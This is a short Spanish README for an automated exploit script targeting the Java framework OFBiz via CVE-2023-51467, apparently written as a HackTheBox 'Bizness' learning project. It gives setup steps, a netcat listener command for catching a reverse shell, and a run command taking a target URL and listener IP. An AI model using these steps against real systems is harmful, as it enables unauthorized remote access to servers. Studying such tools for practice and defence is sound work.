
Auto script de explotación para el framework web Java OF Biz bajo CVE-2023-51467.

Script de explotación automática para el framework web Java OF Biz bajo CVE-2023-51467. Inspirado en la máquina de HackTheBox Bizness.
Este script requiere la herramienta ysoserial y OpenJDK versión 11. Consulta el menú de uso para la instalación.
Configura un listener para capturar la shell con tu método preferido. Aquí tienes un ejemplo con netcat:
nc -nlvp 1337
Ejecuta el script:
python3 badbizness.py [ruta a ysoserial-all.jar] [URL BASE DEL OBJETIVO] [IP DEL LISTENER] [PUERTO DEL LISTENER]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
Esta herramienta fue creada como una forma de aprender más sobre Python. Agradezco a este script por ayudarme a fondo.